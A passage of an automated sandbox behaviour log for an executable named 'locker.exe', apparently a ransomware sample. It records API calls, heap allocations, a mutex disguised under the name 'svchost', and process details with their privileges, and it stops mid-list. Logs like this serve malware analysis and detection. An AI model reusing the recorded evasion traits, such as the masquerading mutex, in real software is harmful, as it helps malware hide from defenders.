\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ;SfÀ¸ø\x0f\x01\x94I6", lpUsedDefaultChar=0x0) returned 256 [0196.539] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x10ff77c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0196.539] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x10ff77c, cbMultiByte=256, lpWideCharStr=0x10feed8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0196.539] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0196.539] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x10fecc8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0196.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x10ff57c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ;SfÀ¸ø\x0f\x01\x94I6", lpUsedDefaultChar=0x0) returned 256 [0196.539] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x0, Size=0x80) returned 0x13d9bd0 [0196.539] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x38d530, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x2b) returned 0x13dc2d8 [0196.540] RtlInitializeSListHead (in: ListHead=0x38cec8 | out: ListHead=0x38cec8) [0196.540] GetLastError () returned 0x0 [0196.540] SetLastError (dwErrCode=0x0) [0196.540] GetEnvironmentStringsW () returned 0x13eb668* [0196.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1379, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1379 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x0, Size=0x563) returned 0x13ec138 [0196.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1379, lpMultiByteStr=0x13ec138, cbMultiByte=1379, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1379 [0196.540] FreeEnvironmentStringsW (penv=0x13eb668) returned 1 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x94) returned 0x13da800 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x1f) returned 0x13ea028 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x28) returned 0x13e3bb8 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x37) returned 0x13e6948 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x3c) returned 0x13dd4a8 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x31) returned 0x13e6988 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x14) returned 0x13e94a0 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x24) returned 0x13e3d08 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0xd) returned 0x13dda90 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x17) returned 0x13e9520 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x2b) returned 0x13dc540 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x15) returned 0x13e9380 [0196.540] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x17) returned 0x13e9580 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x22) returned 0x13e3af8 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0xe) returned 0x13ddb20 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0xc1) returned 0x13dd658 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x3e) returned 0x13dd0b8 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x1b) returned 0x13ea230 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x1d) returned 0x13ea1b8 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x48) returned 0x13e0578 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x12) returned 0x13e96e0 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x18) returned 0x13e96a0 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x1b) returned 0x13ea078 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x24) returned 0x13e3cd8 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x29) returned 0x13dc7a8 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x1e) returned 0x13ea2f8 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x69) returned 0x13d4460 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x17) returned 0x13e9680 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0xf) returned 0x13ddac0 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x16) returned 0x13e9700 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x28) returned 0x13e3be8 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x27) returned 0x13e3b28 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x12) returned 0x13e94c0 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x21) returned 0x13e3c48 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x10) returned 0x13ddad8 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x1c) returned 0x13ea168 [0196.541] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x12) returned 0x13e96c0 [0196.541] HeapFree (in: hHeap=0x13d0000, dwFlags=0x0, lpMem=0x13ec138 | out: hHeap=0x13d0000) returned 1 [0196.542] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0196.542] GetProcAddress (hModule=0x772d0000, lpProcName="FlsAlloc") returned 0x772e4ae0 [0196.542] GetProcAddress (hModule=0x772d0000, lpProcName="FlsFree") returned 0x772e4b00 [0196.542] GetProcAddress (hModule=0x772d0000, lpProcName="FlsGetValue") returned 0x772e4b20 [0196.542] GetProcAddress (hModule=0x772d0000, lpProcName="FlsSetValue") returned 0x772e4b40 [0196.542] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSectionEx") returned 0x7733ebc0 [0196.542] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0196.543] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEventExW") returned 0x7733eb20 [0196.543] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSemaphoreW") returned 0x7733eb90 [0196.543] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSemaphoreExW") returned 0x7733eb80 [0196.543] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolTimer") returned 0x772e6d30 [0196.543] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadpoolTimer") returned 0x779bd7c0 [0196.543] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bb840 [0196.543] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolTimer") returned 0x779bb740 [0196.543] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolWait") returned 0x772e6d70 [0196.544] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadpoolWait") returned 0x779bc0b0 [0196.544] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolWait") returned 0x779bbe10 [0196.544] GetProcAddress (hModule=0x772d0000, lpProcName="FlushProcessWriteBuffers") returned 0x779e2b20 [0196.544] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779d8e50 [0196.544] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessorNumber") returned 0x779d52f0 [0196.544] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSymbolicLinkW") returned 0x772e4510 [0196.544] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentPackageId") returned 0x74cbe260 [0196.545] GetProcAddress (hModule=0x772d0000, lpProcName="GetTickCount64") returned 0x772e0db0 [0196.545] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileInformationByHandleEx") returned 0x772e43d0 [0196.545] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileInformationByHandle") returned 0x7733f110 [0196.545] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x7733f1e0 [0196.545] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeConditionVariable") returned 0x779d3a00 [0196.545] GetProcAddress (hModule=0x772d0000, lpProcName="WakeConditionVariable") returned 0x77a48c50 [0196.545] GetProcAddress (hModule=0x772d0000, lpProcName="WakeAllConditionVariable") returned 0x779d8a90 [0196.546] GetProcAddress (hModule=0x772d0000, lpProcName="SleepConditionVariableCS") returned 0x74d2fca0 [0196.546] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeSRWLock") returned 0x779d3a00 [0196.546] GetProcAddress (hModule=0x772d0000, lpProcName="AcquireSRWLockExclusive") returned 0x779b58e0 [0196.546] GetProcAddress (hModule=0x772d0000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77a32ce0 [0196.546] GetProcAddress (hModule=0x772d0000, lpProcName="ReleaseSRWLockExclusive") returned 0x779b83a0 [0196.546] GetProcAddress (hModule=0x772d0000, lpProcName="SleepConditionVariableSRW") returned 0x74d2fcf0 [0196.546] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolWork") returned 0x772e6db0 [0196.547] GetProcAddress (hModule=0x772d0000, lpProcName="SubmitThreadpoolWork") returned 0x779beb00 [0196.547] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolWork") returned 0x779bed50 [0196.547] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringEx") returned 0x772e7050 [0196.547] GetProcAddress (hModule=0x772d0000, lpProcName="GetLocaleInfoEx") returned 0x772e7190 [0196.547] GetProcAddress (hModule=0x772d0000, lpProcName="LCMapStringEx") returned 0x772e7480 [0196.547] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x74bc0000 [0196.548] GetProcAddress (hModule=0x74bc0000, lpProcName="InitializeConditionVariable") returned 0x779d3a00 [0196.548] GetProcAddress (hModule=0x74bc0000, lpProcName="SleepConditionVariableCS") returned 0x74d2fca0 [0196.548] GetProcAddress (hModule=0x74bc0000, lpProcName="WakeAllConditionVariable") returned 0x779d8a90 [0196.548] RtlInitializeConditionVariable (in: ConditionVariable=0x38cea4 | out: ConditionVariable=0x38cea4) [0196.548] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x800) returned 0x13eb668 [0196.548] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0196.548] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x339518) returned 0x0 [0196.549] GetCurrentThread () returned 0xfffffffe [0196.549] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x10ff8e4, lpExitTime=0x10ff8ec, lpKernelTime=0x10ff8ec, lpUserTime=0x10ff8ec | out: lpCreationTime=0x10ff8e4, lpExitTime=0x10ff8ec, lpKernelTime=0x10ff8ec, lpUserTime=0x10ff8ec) returned 1 [0196.549] RtlInitializeSListHead (in: ListHead=0x38d280 | out: ListHead=0x38d280) [0196.549] GetVersion () returned 0x23f00206 [0196.549] GetVersion () returned 0x23f00206 [0196.549] GetVersion () returned 0x23f00206 [0196.550] GetVersion () returned 0x23f00206 [0196.550] GetVersion () returned 0x23f00206 [0196.550] GetVersion () returned 0x23f00206 [0196.550] GetVersion () returned 0x23f00206 [0196.550] GetVersion () returned 0x23f00206 [0196.550] GetVersion () returned 0x23f00206 [0196.550] GetStartupInfoW (in: lpStartupInfo=0x10ff8d8 | out: lpStartupInfo=0x10ff8d8*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\locker.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0196.550] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x32cf39) returned 0x339518 [0196.550] SetErrorMode (uMode=0x1) returned 0x8001 [0196.550] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="svchost") returned 0x214 [0196.550] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x0) returned 0x102 [0196.551] GetModuleHandleW (lpModuleName=0x0) returned 0x320000 [0196.551] GetModuleHandleW (lpModuleName=0x0) returned 0x320000 [0196.551] HeapFree (in: hHeap=0x13d0000, dwFlags=0x0, lpMem=0x13d9bd0 | out: hHeap=0x13d0000) returned 1 Thread: id = 197 os_tid = 0x1324 Process: id = "15" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xd085000" os_pid = "0x1148" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x1138" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 193 os_tid = 0xfd0 Thread: id = 196 os_tid = 0x1188 Thread: id = 202 os_tid = 0x3e0 Process: id = "16" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x266d1000" os_pid = "0xa24" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x3ac" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 186 os_tid = 0xd20 Thread: id = 188 os_tid = 0xd48 Thread: id = 189 os_tid = 0x11a4 Thread: id = 190 os_tid = 0xd90 Thread: id = 191 os_tid = 0x1294 Thread: id = 192 os_tid = 0xc18 Process: id = "17" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0x2931e000" os_pid = "0x1180" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x3ac" cmd_line = "taskhostw.exe -RegisterDevice -SettingChange -Full" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT 